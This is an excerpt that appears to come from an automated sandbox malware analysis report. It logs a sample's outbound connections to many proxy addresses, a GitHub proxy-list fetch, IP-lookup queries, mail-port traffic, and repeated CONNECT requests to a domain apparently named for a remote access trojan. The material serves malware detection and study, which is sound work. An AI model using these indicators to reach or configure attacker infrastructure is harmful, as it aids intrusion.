                Source: global trafficTCP traffic: 192.168.2.4:50177 -> 213.165.168.190:9898
                Source: global trafficTCP traffic: 192.168.2.4:50179 -> 179.125.51.54:27234
                Source: global trafficTCP traffic: 192.168.2.4:50180 -> 188.132.222.40:8080
                Source: global trafficTCP traffic: 192.168.2.4:50181 -> 212.110.188.222:34411
                Source: global trafficTCP traffic: 192.168.2.4:50183 -> 36.134.91.82:8888
                Source: global trafficTCP traffic: 192.168.2.4:50184 -> 146.190.51.181:3128
                Source: global trafficTCP traffic: 192.168.2.4:50185 -> 132.148.245.247:7183
                Source: global trafficTCP traffic: 192.168.2.4:50187 -> 117.160.250.163:9990
                Source: global trafficTCP traffic: 192.168.2.4:50188 -> 193.56.255.179:3128
                Source: global trafficTCP traffic: 192.168.2.4:50189 -> 80.251.219.40:3128
                Source: global trafficTCP traffic: 192.168.2.4:50192 -> 103.230.49.132:8080
                Source: global trafficTCP traffic: 192.168.2.4:50193 -> 51.222.84.118:21777
                Source: global trafficTCP traffic: 192.168.2.4:50195 -> 177.234.194.158:999
                Source: global trafficTCP traffic: 192.168.2.4:50196 -> 103.148.130.5:8080
                Source: global trafficTCP traffic: 192.168.2.4:50197 -> 162.241.53.72:57364
                Source: global trafficTCP traffic: 192.168.2.4:50198 -> 106.45.221.168:3256
                Source: global trafficTCP traffic: 192.168.2.4:50199 -> 174.75.211.222:4145
                Source: global trafficTCP traffic: 192.168.2.4:50200 -> 162.241.158.204:41274
                Source: global trafficTCP traffic: 192.168.2.4:50201 -> 83.151.4.172:47036
                Source: global trafficTCP traffic: 192.168.2.4:50203 -> 89.34.198.253:5678
                Source: global trafficTCP traffic: 192.168.2.4:50204 -> 189.240.60.163:9090
                Source: global trafficTCP traffic: 192.168.2.4:50202 -> 165.232.89.116:3128
                Source: global trafficTCP traffic: 192.168.2.4:50205 -> 185.217.136.67:1337
                Source: global trafficTCP traffic: 192.168.2.4:50206 -> 41.223.232.117:3128
                Source: global trafficTCP traffic: 192.168.2.4:50207 -> 20.204.214.79:3129
                Source: global trafficTCP traffic: 192.168.2.4:50210 -> 185.208.102.62:8080
                Source: global trafficTCP traffic: 192.168.2.4:50211 -> 45.184.155.3:999
                Source: global trafficTCP traffic: 192.168.2.4:50213 -> 161.97.132.227:3128
                Source: global trafficTCP traffic: 192.168.2.4:50212 -> 154.64.219.2:8888
                Source: global trafficTCP traffic: 192.168.2.4:50215 -> 162.214.227.68:34071
                Source: global trafficTCP traffic: 192.168.2.4:50216 -> 183.89.9.82:8080
                Source: global trafficTCP traffic: 192.168.2.4:50217 -> 194.4.50.62:12334
                Source: global trafficTCP traffic: 192.168.2.4:50219 -> 27.130.253.68:8080
                Source: global trafficTCP traffic: 192.168.2.4:50221 -> 199.223.255.109:3128
                Source: global trafficTCP traffic: 192.168.2.4:50220 -> 138.201.21.232:49775
                Source: global trafficTCP traffic: 192.168.2.4:50222 -> 154.205.152.96:9080
                Source: global trafficTCP traffic: 192.168.2.4:50224 -> 114.232.109.43:8089
                Source: global trafficTCP traffic: 192.168.2.4:50226 -> 46.209.54.102:8080
                Source: global trafficTCP traffic: 192.168.2.4:50228 -> 132.148.128.88:29745
                Source: global trafficTCP traffic: 192.168.2.4:50229 -> 102.23.234.201:8080
                Source: global trafficTCP traffic: 192.168.2.4:50231 -> 161.97.74.176:30000
                Source: global trafficTCP traffic: 192.168.2.4:50230 -> 199.102.107.145:4145
                Source: global trafficTCP traffic: 192.168.2.4:50232 -> 91.189.177.186:3128
                Source: global trafficTCP traffic: 192.168.2.4:50233 -> 13.208.168.179:3128
                Source: global trafficTCP traffic: 192.168.2.4:50235 -> 206.189.9.30:42331
                Source: global trafficTCP traffic: 192.168.2.4:50236 -> 110.185.105.210:51800
                Source: global trafficTCP traffic: 192.168.2.4:50238 -> 186.251.255.41:31337
                Source: global trafficTCP traffic: 192.168.2.4:50237 -> 159.192.102.249:8080
                Source: global trafficTCP traffic: 192.168.2.4:50241 -> 103.159.66.61:8080
                Source: global trafficTCP traffic: 192.168.2.4:50242 -> 66.225.246.238:8080
                Source: global trafficTCP traffic: 192.168.2.4:50243 -> 68.1.210.163:4145
                Source: global trafficTCP traffic: 192.168.2.4:50244 -> 24.249.199.4:4145
                Source: global trafficTCP traffic: 192.168.2.4:50246 -> 81.199.14.49:1088
                Source: global trafficTCP traffic: 192.168.2.4:50248 -> 209.14.112.8:1080
                Source: global trafficTCP traffic: 192.168.2.4:50250 -> 124.163.236.54:7302
                Source: global trafficTCP traffic: 192.168.2.4:50253 -> 34.84.95.189:8080
                Source: global trafficTCP traffic: 192.168.2.4:50255 -> 199.102.106.94:4145
                Source: global trafficTCP traffic: 192.168.2.4:50256 -> 206.189.145.23:49614
                Source: global trafficTCP traffic: 192.168.2.4:50257 -> 103.53.110.45:10801
                Source: global trafficTCP traffic: 192.168.2.4:50258 -> 128.199.221.91:49865
                Source: global trafficTCP traffic: 192.168.2.4:50259 -> 103.59.190.209:56252
                Source: global trafficTCP traffic: 192.168.2.4:50260 -> 43.129.228.46:7891
                Source: global trafficTCP traffic: 192.168.2.4:50262 -> 101.255.62.129:8080
                Source: global trafficTCP traffic: 192.168.2.4:50263 -> 165.154.227.154:5096
                Source: global trafficTCP traffic: 192.168.2.4:50265 -> 67.43.227.227:4711
                Source: global trafficTCP traffic: 192.168.2.4:50266 -> 43.132.184.228:8181
                Source: global trafficTCP traffic: 192.168.2.4:50267 -> 216.176.187.99:8889
                Source: global trafficTCP traffic: 192.168.2.4:50269 -> 188.168.24.222:81
                Source: global trafficTCP traffic: 192.168.2.4:50270 -> 142.4.7.20:43100
                Source: global trafficTCP traffic: 192.168.2.4:50271 -> 202.179.188.178:8080
                Source: global trafficTCP traffic: 192.168.2.4:50274 -> 162.214.165.6:42624
                Source: global trafficTCP traffic: 192.168.2.4:50277 -> 103.129.3.246:83
                Source: global trafficTCP traffic: 192.168.2.4:50279 -> 191.97.2.198:5678
                Source: global trafficTCP traffic: 192.168.2.4:50280 -> 194.150.69.56:8888
                Source: global trafficTCP traffic: 192.168.2.4:50281 -> 197.232.65.40:55443
                Source: global trafficTCP traffic: 192.168.2.4:50284 -> 54.212.22.168:1080
                Source: global trafficTCP traffic: 192.168.2.4:50286 -> 45.176.97.90:999
                Source: global trafficTCP traffic: 192.168.2.4:50287 -> 222.138.76.6:9002
                Source: global trafficTCP traffic: 192.168.2.4:50288 -> 3.25.234.175:8888
                Source: global trafficTCP traffic: 192.168.2.4:50289 -> 186.125.218.145:999
                Source: global trafficTCP traffic: 192.168.2.4:50292 -> 128.199.252.41:8000
                Source: global trafficTCP traffic: 192.168.2.4:50294 -> 1.2.209.194:4145
                Source: global trafficTCP traffic: 192.168.2.4:50295 -> 103.35.189.217:3128
                Source: global trafficTCP traffic: 192.168.2.4:50296 -> 38.41.0.94:999
                Source: global trafficTCP traffic: 192.168.2.4:50297 -> 162.241.46.40:49401
                Source: global trafficTCP traffic: 192.168.2.4:50298 -> 91.202.230.219:8080
                Source: global trafficTCP traffic: 192.168.2.4:50299 -> 13.40.239.130:3128
                Source: global trafficTCP traffic: 192.168.2.4:50300 -> 83.56.15.57:5678
                Source: global trafficTCP traffic: 192.168.2.4:50301 -> 45.159.150.23:3128
                Source: global trafficTCP traffic: 192.168.2.4:50305 -> 95.31.42.199:3629
                Source: global trafficTCP traffic: 192.168.2.4:50306 -> 203.96.177.211:48553
                Source: global trafficTCP traffic: 192.168.2.4:50307 -> 50.199.46.20:32100
                Source: global trafficTCP traffic: 192.168.2.4:50308 -> 103.112.254.66:5678
                Source: global trafficTCP traffic: 192.168.2.4:50309 -> 119.42.71.103:4145
                Source: global trafficTCP traffic: 192.168.2.4:50310 -> 95.217.104.21:24815
                Source: global trafficTCP traffic: 192.168.2.4:50311 -> 190.61.41.165:999
                Source: global trafficTCP traffic: 192.168.2.4:50318 -> 86.107.178.109:3128
                Source: global trafficTCP traffic: 192.168.2.4:50320 -> 14.225.254.128:5555
                Source: global trafficTCP traffic: 192.168.2.4:50319 -> 103.49.28.23:12113
                Source: global trafficTCP traffic: 192.168.2.4:50321 -> 139.99.148.90:3128
                Source: global trafficTCP traffic: 192.168.2.4:50322 -> 94.131.203.7:8080
                Source: global trafficTCP traffic: 192.168.2.4:50324 -> 170.239.207.241:999
                Source: global trafficTCP traffic: 192.168.2.4:50323 -> 94.153.163.226:81
                Source: global trafficTCP traffic: 192.168.2.4:50325 -> 162.19.7.56:44195
                Source: global trafficTCP traffic: 192.168.2.4:50327 -> 103.124.196.134:8080
                Source: global trafficTCP traffic: 192.168.2.4:50326 -> 4.236.183.37:8080
                Source: global trafficTCP traffic: 192.168.2.4:50328 -> 51.79.87.144:22500
                Source: global trafficTCP traffic: 192.168.2.4:50329 -> 157.245.131.28:30422
                Source: global trafficTCP traffic: 192.168.2.4:50333 -> 103.170.115.213:2020
                Source: global trafficTCP traffic: 192.168.2.4:50332 -> 38.54.116.9:3128
                Source: global trafficTCP traffic: 192.168.2.4:50334 -> 103.84.178.2:4153
                Source: global trafficTCP traffic: 192.168.2.4:50336 -> 163.172.131.178:16379
                Source: global trafficTCP traffic: 192.168.2.4:50337 -> 51.68.164.77:32824
                Source: global trafficTCP traffic: 192.168.2.4:50338 -> 167.172.79.17:8000
                Source: global trafficTCP traffic: 192.168.2.4:50341 -> 45.234.61.173:999
                Source: global trafficTCP traffic: 192.168.2.4:50343 -> 178.115.253.35:8080
                Source: global trafficTCP traffic: 192.168.2.4:50345 -> 194.145.209.187:3128
                Source: global trafficTCP traffic: 192.168.2.4:50346 -> 89.171.116.65:65000
                Source: global trafficTCP traffic: 192.168.2.4:50347 -> 181.78.19.248:999
                Source: global trafficTCP traffic: 192.168.2.4:50348 -> 203.161.30.10:8765
                Source: global trafficTCP traffic: 192.168.2.4:50349 -> 46.101.102.134:3128
                Source: global trafficTCP traffic: 192.168.2.4:50350 -> 212.31.100.138:4153
                Source: global trafficTCP traffic: 192.168.2.4:50351 -> 109.75.34.152:59341
                Source: global trafficTCP traffic: 192.168.2.4:50352 -> 95.84.166.138:8080
                Source: global trafficTCP traffic: 192.168.2.4:50354 -> 46.209.207.153:8080
                Source: global trafficTCP traffic: 192.168.2.4:50353 -> 177.91.76.34:4153
                Source: global trafficTCP traffic: 192.168.2.4:50355 -> 197.234.13.36:4145
                Source: global trafficTCP traffic: 192.168.2.4:50359 -> 173.249.29.243:9123
                Source: global trafficTCP traffic: 192.168.2.4:50358 -> 92.255.190.41:4153
                Source: global trafficTCP traffic: 192.168.2.4:50361 -> 171.100.23.244:5678
                Source: global trafficTCP traffic: 192.168.2.4:50360 -> 62.171.184.96:3128
                Source: global trafficTCP traffic: 192.168.2.4:50362 -> 202.124.46.97:4145
                Source: global trafficTCP traffic: 192.168.2.4:50363 -> 162.240.239.103:42771
                Source: global trafficTCP traffic: 192.168.2.4:50366 -> 117.70.49.27:8089
                Source: global trafficTCP traffic: 192.168.2.4:50365 -> 103.48.68.101:83
                Source: global trafficTCP traffic: 192.168.2.4:50367 -> 190.97.238.88:999
                Source: global trafficTCP traffic: 192.168.2.4:50368 -> 41.65.236.37:1981
                Source: global trafficTCP traffic: 192.168.2.4:50369 -> 162.19.7.53:64654
                Source: global trafficTCP traffic: 192.168.2.4:50371 -> 190.95.195.105:999
                Source: global trafficTCP traffic: 192.168.2.4:50372 -> 209.142.64.219:39789
                Source: global trafficTCP traffic: 192.168.2.4:50373 -> 51.158.68.68:8811
                Source: global trafficTCP traffic: 192.168.2.4:50374 -> 190.90.22.106:999
                Source: global trafficTCP traffic: 192.168.2.4:50376 -> 181.204.0.36:999
                Source: global trafficTCP traffic: 192.168.2.4:50378 -> 137.59.161.177:8080
                Source: global trafficTCP traffic: 192.168.2.4:50377 -> 179.60.219.63:999
                Source: global trafficTCP traffic: 192.168.2.4:50380 -> 201.144.20.231:5678
                Source: global trafficTCP traffic: 192.168.2.4:50381 -> 202.40.181.220:31247
                Source: global trafficTCP traffic: 192.168.2.4:50383 -> 136.244.99.51:8888
                Source: global trafficTCP traffic: 192.168.2.4:50382 -> 182.52.229.165:8080
                Source: global trafficTCP traffic: 192.168.2.4:50384 -> 103.234.28.211:8181
                Source: global trafficTCP traffic: 192.168.2.4:50388 -> 116.5.187.116:7890
                Source: global trafficTCP traffic: 192.168.2.4:50385 -> 201.71.3.42:999
                Source: global trafficTCP traffic: 192.168.2.4:50390 -> 45.117.179.179:6522
                Source: global trafficTCP traffic: 192.168.2.4:50391 -> 128.199.196.31:27102
                Source: global trafficTCP traffic: 192.168.2.4:50392 -> 197.234.13.17:4145
                Source: global trafficTCP traffic: 192.168.2.4:50393 -> 191.97.9.228:999
                Source: global trafficTCP traffic: 192.168.2.4:50394 -> 51.161.131.84:49202
                Source: global trafficTCP traffic: 192.168.2.4:50395 -> 95.57.216.118:8080
                Source: global trafficTCP traffic: 192.168.2.4:50396 -> 5.78.89.192:8080
                Source: global trafficTCP traffic: 192.168.2.4:50398 -> 154.73.29.161:8080
                Source: global trafficTCP traffic: 192.168.2.4:50399 -> 45.113.80.37:9050
                Source: global trafficTCP traffic: 192.168.2.4:50400 -> 202.162.219.10:1080
                Source: global trafficTCP traffic: 192.168.2.4:50402 -> 189.173.223.225:999
                Source: global trafficTCP traffic: 192.168.2.4:50403 -> 152.136.151.195:2080
                Source: global trafficTCP traffic: 192.168.2.4:50404 -> 162.241.137.197:60200
                Source: global trafficTCP traffic: 192.168.2.4:50405 -> 213.184.153.66:8080
                Source: global trafficTCP traffic: 192.168.2.4:50407 -> 220.194.189.144:3128
                Source: global trafficTCP traffic: 192.168.2.4:50408 -> 72.195.114.169:4145
                Source: global trafficTCP traffic: 192.168.2.4:50409 -> 103.176.96.132:8080
                Source: global trafficTCP traffic: 192.168.2.4:50412 -> 91.148.127.162:8080
                Source: global trafficTCP traffic: 192.168.2.4:50413 -> 20.106.146.212:6001
                Source: global trafficTCP traffic: 192.168.2.4:50416 -> 190.114.245.122:999
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 93.171.243.253 93.171.243.253
                Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                Source: Joe Sandbox ViewIP Address: 24.230.33.96 24.230.33.96
                Source: Joe Sandbox ViewASN Name: BYTEMARK-ASGB BYTEMARK-ASGB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.4:49744 -> 160.248.80.91:587
                Source: global trafficTCP traffic: 192.168.2.4:55268 -> 34.195.165.88:587
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
